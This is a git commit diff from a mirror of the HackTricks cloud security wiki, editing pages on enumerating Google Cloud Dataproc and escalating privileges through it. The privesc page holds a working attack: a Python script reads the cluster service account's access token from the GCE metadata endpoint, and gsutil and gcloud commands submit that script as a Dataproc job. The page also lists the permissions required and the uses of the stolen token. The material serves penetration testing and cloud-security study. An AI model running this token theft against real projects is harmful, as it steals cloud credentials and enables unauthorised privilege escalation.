mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-28 05:33:10 -08:00
dataproc enum & privesc
This commit is contained in:
@@ -1,27 +1,20 @@
|
||||
# GCP Dataproc Privilege Escalation
|
||||
|
||||
## Dataproc Roles and Privilege Escalation
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Google Cloud Dataproc roles like roles/dataproc.editor and roles/dataproc.admin grant significant permissions over Dataproc resources. If these roles are assigned to a compromised user or service account, they can be abused to escalate privileges by leaking sensitive metadata tokens or accessing other GCP resources.
|
||||
## Dataproc
|
||||
|
||||
## Key Permissions in Dataproc Roles
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-dataproc-enum.md
|
||||
{{#endref}}
|
||||
|
||||
roles/dataproc.editor - Modify Dataproc jobs. Submit PySpark, Spark, Hadoop, and other job types to a cluster. Access job logs and configurations. Interact with associated GCP services like Cloud Storage and BigQuery.
|
||||
### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`
|
||||
|
||||
roles/dataproc.admin - Full control over Dataproc clusters, including creating, deleting, and managing clusters.
|
||||
|
||||
These permissions make both roles highly sensitive and dangerous if misused.
|
||||
|
||||
## dataproc.jobs.create & dataproc.clusters.use
|
||||
|
||||
The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
|
||||
|
||||
the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)
|
||||
|
||||
|
||||
## Privilege Escalation via Metadata Token Leaking
|
||||
I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below.
|
||||
|
||||
#### Steps to exploit
|
||||
|
||||
- Place the job script on the GCP Bucket
|
||||
|
||||
- Submit a job to a Dataproc cluster.
|
||||
|
||||
@@ -29,15 +22,9 @@ the following permissions were assigned to the SA for the PoC (dataproc.clusters
|
||||
|
||||
- Leak the service account token used by the cluster.
|
||||
|
||||
### Example Script for token leaking
|
||||
|
||||
The following script demonstrates how an attacker can submit a job to a Dataproc cluster to leak the metadata token:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
## Metadata server URL to fetch the access token
|
||||
|
||||
```
|
||||
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
|
||||
headers = {"Metadata-Flavor": "Google"}
|
||||
|
||||
@@ -56,20 +43,14 @@ if __name__ == "__main__":
|
||||
fetch_metadata_token()
|
||||
```
|
||||
|
||||
### Steps to exploit
|
||||
|
||||
```
|
||||
```bash
|
||||
# Copy the script to the storage bucket
|
||||
gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
|
||||
gsutil cp <python-script> gs://<bucket-name>/<python-script>
|
||||
|
||||
# Submit the malicious job
|
||||
gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
|
||||
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
|
||||
--cluster=<cluster-name> \
|
||||
--region=<region>
|
||||
```
|
||||
### Use the Leaked Token
|
||||
|
||||
The leaked token can be used to:
|
||||
|
||||
- Access GCP APIs and resources (depending on the token’s permissions).
|
||||
- Enumerate resources such as Cloud Storage buckets, BigQuery datasets, and more.
|
||||
- Potentially escalate privileges further if the token has high-level permissions (e.g., roles/owner)
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,4 +1,6 @@
|
||||
# GCP Dataproc Enum
|
||||
# GCP - Dataproc Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Basic Infromation
|
||||
|
||||
@@ -36,12 +38,10 @@ gcloud dataproc jobs list --region=<region>
|
||||
gcloud dataproc jobs describe <job-id> --region=<region>
|
||||
```
|
||||
|
||||
### Post Exploitation
|
||||
### Privesc
|
||||
|
||||
Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:
|
||||
{{#ref}}
|
||||
../gcp-privilege-escalation/gcp-dataproc-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
Access to sensitive APIs (e.g., BigQuery, Cloud Storage).
|
||||
|
||||
Token Exfiltration via metadata server.
|
||||
|
||||
Data Exfiltration from misconfigured buckets or job logs.
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Reference in New Issue
Block a user